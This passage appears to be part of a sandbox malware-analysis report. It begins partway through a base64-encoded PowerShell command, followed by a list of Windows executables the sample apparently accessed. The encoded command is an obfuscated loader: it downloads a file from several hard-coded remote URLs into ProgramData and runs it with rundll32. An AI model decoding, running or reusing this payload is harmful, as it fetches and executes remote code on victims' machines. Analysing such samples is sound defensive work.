GUAYgBSAGUAcQB1AGUAcwB0ACAAJABMAGUAdAB0AHIAdQByAGUATwB2AGUAcgBhAGIAdQBzAGkAdgBlAG4AZQBzAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYwBsAGEAbQBvAHUAcgBpAHMAdAAuAHoAbwBvAGIAbABhAHMAdAA7ACQAQQBzAHMAaQBkAHUAbwB1AHMAbgBlAHMAcwBEAGUAbgBhAHQAdQByAGEAdABpAG8AbgBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBkAEEAQgBwAEEARwA0AEEAZABBAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBUAFEAQgBwAEEARwA0AEEAWgBRAEIAeQBBAEcARQBBAGEAUQBCAHYAQQBHAGMAQQBhAFEAQgBqAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQAYwBBAE4AdwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGMAQQBMAGcAQQA0AEEARABBAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB4AEEAQQA9AD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBiAFEAQgAxAEEARwB3AEEAWQB3AEIAbABBAEcANABBAGQAQQBCAHoAQQBDADQAQQBaAGcAQgB5AEEAQQA9AD0AIgA7ACQAcwBwAHIAaQB0AGUAaABvAG8AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYQBtAG8AdQByAGkAcwB0AC4AegBvAG8AYgBsAGEAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA0ADgAOQAwADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAE0AQQBiAEEAQgBoAEEARwAwAEEAYgB3AEIAMQBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgA2AEEARwA4AEEAYgB3AEIAaQBBAEcAdwBBAFkAUQBCAHoAQQBIAFEAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEQAZQBjAHUAcgByAGUAbgBjAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAEwAZwBBADQAQQBEAEUAQQB6AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAbABBAEcAMABBAGMAQQBCAHMAQQBHADgAQQBlAFEAQgBsAEEARwBRAEEATABnAEIAdwBBAEcAZwBBAGIAdwBCADAAQQBHADgAQQBjAHcAQQA9ACIAOwAkAFMAdABlAGcAYQBuAG8AcABvAGQAbwB1AHMAUgBpAGMAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQAzAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE4AdwBBAHgAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBnAEEAeABBAEQAawBBAEwAZwBBADEAQQBEAE0AQQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AQQBBAHUAQQBEAEUAQQBPAEEAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQA9ACIAOwAkAFQAZQBuAGEAaQBsAHMASgB1AG0AcABvAGYAZgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABjAEEATABnAEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A" |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |